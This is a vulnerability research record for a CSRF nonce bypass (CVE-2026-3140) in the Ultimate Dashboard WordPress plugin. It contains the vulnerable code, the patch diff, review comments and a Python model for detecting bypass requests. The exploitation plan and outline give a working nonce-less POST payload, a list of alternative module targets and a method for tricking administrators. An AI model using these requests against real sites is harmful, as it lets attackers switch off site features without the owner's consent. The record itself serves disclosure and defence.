[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fKwUs2BH69sCkpgjvtqSAiCDj9J4nmwnrUup00jKs_hs":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-3140","ultimate-dashboard-cross-site-request-forgery-to-module-activationdeactivation","Ultimate Dashboard \u003C= 3.8.14 - Cross-Site Request Forgery to Module Activation\u002FDeactivation","The Ultimate Dashboard plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.8.14. This is due to a flawed nonce validation conditional in the 'handle_module_actions' function. 
This makes it possible for unauthenticated attackers to toggle plugin modules on or off via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","ultimate-dashboard",null,"\u003C=3.8.14","3.8.15","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Cross-Site Request Forgery (CSRF)","2026-04-30 00:00:00","2026-05-01 11:18:50",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fbbcdb70f-77db-48ab-ae23-c46caecdd3be?source=api-prod",1,[22,23,24,25,26,27,28,29],"assets\u002Fcss\u002Fadmin.css","assets\u002Fcss\u002Fheatbox.css","assets\u002Fjs\u002Fnotice-dismissal.js","class-setup.php","modules\u002Fadmin-bar\u002Ftemplates\u002Fmetaboxes\u002Fremove-admin-bar-metabox.php","modules\u002Fadmin-page\u002Fassets\u002Fcss\u002Fedit-admin-page.css","modules\u002Ffeature\u002Fclass-feature-module.php","modules\u002Fonboarding-wizard\u002Fassets\u002Fcss\u002Fonboarding-wizard.css","researched",false,3,"# Exploitation Research Plan: CVE-2026-3140 (Ultimate Dashboard CSRF)\n\n## 1. Vulnerability Summary\nThe **Ultimate Dashboard** plugin (\u003C= 3.8.14) is vulnerable to **Cross-Site Request Forgery (CSRF)** due to a logic error in the nonce validation within the `handle_module_actions` function. The code incorrectly allows requests to proceed if the `nonce` parameter is completely omitted. This allows an attacker to trick an authenticated administrator into activating or deactivating core plugin modules (like White Labeling or the Admin Menu Editor), potentially disrupting site administration or disabling security-related features.\n\n## 2. 
Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **AJAX Action:** `udb_handle_module_actions`\n*   **Vulnerable Function:** `Udb\\Feature\\Feature_Module::handle_module_actions`\n*   **HTTP Method:** `POST`\n*   **Authentication Required:** Yes (must be triggered by a user with `manage_options` capability via CSRF).\n*   **Payload Parameter:** `name` (module slug) and `status` (`true`\u002F`false`).\n*   **Vulnerability Type:** CSRF via Nonce Bypass (Conditional Logic Flaw).\n\n## 3. Code Flow\n1.  The plugin registers the AJAX action in `modules\u002Ffeature\u002Fclass-feature-module.php`:\n    ```php\n    add_action( 'wp_ajax_udb_handle_module_actions', array( self::get_instance(), 'handle_module_actions' ) );\n    ```\n2.  When a request is sent to `admin-ajax.php` with `action=udb_handle_module_actions`, the `handle_module_actions` function is invoked.\n3.  The function performs a check to validate the nonce:\n    ```php\n    public function handle_module_actions() {\n        if ( empty( $_POST ) || ( ! empty( $_POST['nonce'] ) && ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['nonce'] ) ), 'udb_module_nonce_action' ) ) ) {\n            wp_send_json_error( __( 'Invalid nonce', 'ultimate-dashboard' ) );\n        }\n        \u002F\u002F ...\n    ```\n4.  **Logic Flaw:** The conditional `( ! empty( $_POST['nonce'] ) && ! wp_verify_nonce(...) )` evaluates to `false` if `$_POST['nonce']` is **missing**. \n    - If `nonce` is provided and wrong: `(true && true)` -> Error.\n    - If `nonce` is missing: `(false && ...)` -> Condition fails, the block is skipped, and the code proceeds.\n5.  The function then checks for the user's capability (`manage_options`).\n6.  Finally, it updates the `udb_modules` option:\n    ```php\n    $saved_modules[ $name ] = $status;\n    update_option( 'udb_modules', $saved_modules );\n    ```\n\n## 4. 
Nonce Acquisition Strategy\n**No nonce is required for exploitation.** \nThe vulnerability exists specifically because the nonce check is bypassed when the `nonce` parameter is absent from the `$_POST` array. Because the guard is `! empty( $_POST['nonce'] )`, and PHP's `empty()` is also true for `''` and `'0'`, a blank or zero `nonce` takes the same path as an omitted one.\n\n## 5. Exploitation Strategy\nTo demonstrate the CSRF, we will perform a request that disables a visible module (e.g., `white_label`) while authenticated as an administrator.\n\n### Step-by-Step Plan:\n1.  **Preparation:** Ensure the administrator is logged in.\n2.  **Payload Injection:** Issue a `POST` request to `admin-ajax.php` without a `nonce` parameter.\n3.  **Target Module:** `white_label`.\n4.  **Target Status:** `false` (to deactivate).\n\n### HTTP Request (via `http_request` tool):\n```json\n{\n  \"method\": \"POST\",\n  \"url\": \"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php\",\n  \"headers\": {\n    \"Content-Type\": \"application\u002Fx-www-form-urlencoded\"\n  },\n  \"body\": \"action=udb_handle_module_actions&name=white_label&status=false\"\n}\n```\n\n## 6. Test Data Setup\n1.  **Plugin State:** Ensure `Ultimate Dashboard` version \u003C= 3.8.14 is installed and active.\n2.  **Initial Configuration:** By default, modules are enabled. We can verify this by checking the database option `udb_modules`.\n3.  **Administrator Session:** The `http_request` must carry the administrator's session cookies, as the victim's browser would in a real CSRF; the point of the test is that the request succeeds with cookies alone and no nonce.\n\n## 7. Expected Results\n*   The server should respond with: `{\"success\":true,\"data\":{\"message\":\"Saved\"}}`.\n*   Against 3.8.15 or later the same request is rejected with `{\"success\":false,\"data\":\"Invalid token\"}`, because the patched handler verifies the nonce unconditionally: an absent nonce becomes `''`, which `wp_verify_nonce` rejects.\n\n## 8. Verification Steps\nAfter sending the HTTP request, verify the module status using `wp-cli`:\n```bash\n# Check the value of the udb_modules option\nwp option get udb_modules --format=json\n```\n**Success Condition:** The JSON output should show `\"white_label\":\"false\"`.\n\n## 9. 
Alternative Approaches\nIf the `white_label` module is already disabled, target a different module identifier found in `class-setup.php`:\n*   `login_customizer`\n*   `login_redirect`\n*   `admin_pages`\n*   `admin_menu_editor`\n*   `admin_bar_editor`\n\nExample for `admin_menu_editor`:\n`action=udb_handle_module_actions&name=admin_menu_editor&status=false`","The Ultimate Dashboard plugin for WordPress (\u003C= 3.8.14) is vulnerable to Cross-Site Request Forgery (CSRF) because the module activation handler contains a flawed nonce check that is bypassed when the nonce parameter is missing. This allows an attacker to trick a site administrator into activating or deactivating core plugin modules, such as White Labeling or the Admin Menu Editor, by clicking on a malicious link.","\u002F\u002F modules\u002Ffeature\u002Fclass-feature-module.php line 117\npublic function handle_module_actions() {\n\n\tif ( empty( $_POST ) || ( ! empty( $_POST['nonce'] ) && ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['nonce'] ) ), 'udb_module_nonce_action' ) ) ) {\n\t\twp_send_json_error( __( 'Invalid nonce', 'ultimate-dashboard' ) );\n\t}\n\n---\n\n\u002F\u002F class-setup.php line 452\npublic function dismiss_review_notice() {\n\n\tif ( empty( $_POST['dismiss'] ) ) {\n\t\twp_send_json_error( 'Invalid Request' );\n\t}\n\n\tupdate_option( 'review_notice_dismissed', 1 );\n\twp_send_json_success( 'Review notice has been dismissed.' );\n\n}","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fultimate-dashboard\u002F3.8.14\u002Fclass-setup.php\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fultimate-dashboard\u002F3.8.15\u002Fclass-setup.php\n@@ -452,12 +460,18 @@\n \tpublic function dismiss_review_notice() {\n \n+\t\t$nonce = isset( $_POST['nonce'] ) ? sanitize_text_field( wp_unslash( $_POST['nonce'] ) ) : '';\n+\n+\t\tif ( ! 
wp_verify_nonce( $nonce, 'udb_dismiss_notice' ) ) {\n+\t\t\twp_send_json_error( __( 'Invalid token', 'ultimate-dashboard' ) );\n+\t\t}\n+\n \t\tif ( empty( $_POST['dismiss'] ) ) {\n-\t\t\twp_send_json_error( 'Invalid Request' );\n+\t\t\twp_send_json_error( __( 'Invalid request', 'ultimate-dashboard' ) );\n \t\t}\n \n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fultimate-dashboard\u002F3.8.14\u002Fmodules\u002Ffeature\u002Fclass-feature-module.php\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fultimate-dashboard\u002F3.8.15\u002Fmodules\u002Ffeature\u002Fclass-feature-module.php\n@@ -117,8 +117,10 @@\n \t *\u002F\n \tpublic function handle_module_actions() {\n \n-\t\tif ( empty( $_POST ) || ( ! empty( $_POST['nonce'] ) && ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['nonce'] ) ), 'udb_module_nonce_action' ) ) ) {\n-\t\t\twp_send_json_error( __( 'Invalid nonce', 'ultimate-dashboard' ) );\n+\t\t$nonce = isset( $_POST['nonce'] ) ? sanitize_text_field( wp_unslash( $_POST['nonce'] ) ) : '';\n+\n+\t\tif ( ! wp_verify_nonce( $nonce, 'udb_module_nonce_action' ) ) {\n+\t\t\twp_send_json_error( __( 'Invalid token', 'ultimate-dashboard' ) );\n \t\t}","1. Identify the target module to toggle (e.g., 'white_label' or 'admin_menu_editor').\n2. Construct a CSRF payload targeting the WordPress AJAX endpoint '\u002Fwp-admin\u002Fadmin-ajax.php'.\n3. Format the POST request with the following parameters: 'action=udb_handle_module_actions', 'name=[module_slug]', and 'status=[true\u002Ffalse]'.\n4. Crucially, omit the 'nonce' parameter entirely from the POST body to exploit the logic flaw in handle_module_actions() that skips verification when the nonce is absent.\n5. 
Trick an authenticated administrator with 'manage_options' capabilities into visiting a malicious site or clicking a link that triggers this background request via an auto-submitting form or script.","gemini-3-flash-preview","2026-05-04 17:45:51","2026-05-04 17:46:11",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","3.8.14","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fultimate-dashboard\u002Ftags\u002F3.8.14","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fultimate-dashboard.3.8.14.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fultimate-dashboard\u002Ftags\u002F3.8.15","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fultimate-dashboard.3.8.15.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fultimate-dashboard\u002Ftags"]
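Review bot: the new `wp_verify_nonce( $nonce, 'udb_dismiss_notice' )` guard in the `dismiss_review_notice()` hunk of class-setup.php is not paired with a capability check anywhere in the visible context, so any logged-in user whose session the nonce was issued to can still dismiss the notice, and the handler shown in the vulnerable-code excerpt stores that as a site-wide `update_option( 'review_notice_dismissed', 1 )`. Add `if ( ! current_user_can( 'manage_options' ) ) { wp_send_json_error( __( 'Unauthorized', 'ultimate-dashboard' ) ); }` after the nonce check, and confirm that `assets/js/notice-dismissal.js` (listed among the changed files but not shown in this diff) now sends a nonce created with the same `udb_dismiss_notice` action, otherwise every legitimate dismissal will hit the new 'Invalid token' branch.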
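Review bot: in the `handle_module_actions()` hunk of modules/feature/class-feature-module.php, dropping the old `empty( $_POST )` guard is safe only because `wp_verify_nonce( '', 'udb_module_nonce_action' )` returns false for the `''` fallback; a one-line comment saying so would stop a future edit from reintroducing the `! empty( $_POST['nonce'] ) && ...` shape, which looked reasonable yet let `nonce` be omitted, blank or `0` (all `empty()` in PHP). `check_ajax_referer( 'udb_module_nonce_action', 'nonce' )` does the same isset-then-verify work and dies on failure, which is the usual WordPress idiom here, and the `manage_options` capability check that follows this block must stay, because a nonce proves intent, not authorization. Note too that the error text changed from 'Invalid nonce' to 'Invalid token', so any client code matching on the message needs updating.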
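The truth table in step 4 of the research plan's Code Flow section, as an added example in Python (this is not the plugin's code and not part of the original page): it transcribes both the 3.8.14 condition and the 3.8.15 replacement with PHP's `empty()` and `isset()` semantics made explicit, then runs them over constructed request bodies, the first of which is the plan's own request. `wp_verify_nonce` is replaced by a stand-in that accepts one constructed token (`VALID_NONCE`), and the `sanitize_text_field`/`wp_unslash` step and the later `manage_options` check are left out; the token and the sample bodies are assumptions. It also shows something the plan does not: because `empty()` is true for `''` and `'0'`, a blank or zero `nonce` takes the same path as an omitted one.

```python
"""Model of the nonce check in Ultimate Dashboard's handle_module_actions(),
as shipped in 3.8.14 and as patched in 3.8.15, with PHP's empty()/isset()
semantics spelled out. Added illustration, not the plugin's code."""
from urllib.parse import parse_qs

NONCE_ACTION = "udb_module_nonce_action"
# Constructed stand-in for a valid nonce. Real WordPress nonces are
# HMAC-derived, bound to the user's session and valid for a limited window.
VALID_NONCE = "a1b2c3d4e5"


def php_empty(value) -> bool:
    """PHP empty(): true for an unset key/None, False, '', '0', 0, 0.0, [] or {}."""
    if value is None or value is False:
        return True
    if isinstance(value, (str, bytes)):
        return value in ("", "0", b"", b"0")
    if isinstance(value, (list, dict, tuple)):
        return len(value) == 0
    if isinstance(value, (int, float)):
        return value == 0
    return False


def wp_verify_nonce(nonce: str, action: str) -> bool:
    """Stand-in for wp_verify_nonce(): only the constructed token for the
    expected action verifies. The real function returns 1, 2 or false."""
    return action == NONCE_ACTION and nonce == VALID_NONCE


def parse_post(body: str) -> dict:
    """Form-encoded body -> $_POST-like dict (first value per key).
    keep_blank_values=True so 'nonce=' yields '' as PHP does, not a dropped key."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def vulnerable_accepts(post: dict) -> bool:
    """3.8.14, transcribed: reject only if $_POST is empty, or a NON-empty nonce
    fails verification. A missing, '' or '0' nonce short-circuits the && and
    the request proceeds to the capability check and update_option()."""
    nonce = post.get("nonce")
    rejected = php_empty(post) or (
        not php_empty(nonce) and not wp_verify_nonce(nonce, NONCE_ACTION)
    )
    return not rejected


def fixed_accepts(post: dict) -> bool:
    """3.8.15: $nonce = isset($_POST['nonce']) ? ... : ''; then verify
    unconditionally. isset() is true for '' and '0', but wp_verify_nonce()
    rejects both, and '' is what an absent key turns into."""
    nonce = post["nonce"] if post.get("nonce") is not None else ""
    return wp_verify_nonce(nonce, NONCE_ACTION)


def classify(body: str) -> tuple:
    """(accepted by 3.8.14, accepted by 3.8.15) for one request body."""
    post = parse_post(body)
    return vulnerable_accepts(post), fixed_accepts(post)


def bypass_bodies(bodies) -> list:
    """Bodies 3.8.14 lets through that 3.8.15 rejects: the set a WAF rule or
    log triage for this CVE should flag."""
    return [b for b in bodies if classify(b) == (True, False)]


# Constructed request bodies; the first is the request from the plan above.
BASE = "action=udb_handle_module_actions&name=white_label&status=false"
SAMPLE_BODIES = [
    BASE,                            # nonce omitted
    BASE + "&nonce=",                # nonce present but blank
    BASE + "&nonce=0",               # '0' is empty() in PHP
    BASE + "&nonce=deadbeef",        # wrong token
    BASE + "&nonce=" + VALID_NONCE,  # legitimate request from the admin UI
    "",                              # empty POST
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        vuln, fixed = classify(body)
        label = body or "<empty POST>"
        print(f"{label:<78} 3.8.14={'ACCEPT' if vuln else 'reject'}"
              f"  3.8.15={'ACCEPT' if fixed else 'reject'}")
```

Running it prints the accept/reject decision per body for both versions; `bypass_bodies()` returns the three requests worth alerting on for this CVE: a POST to admin-ajax.php with `action=udb_handle_module_actions` whose `nonce` is absent, blank or `0`.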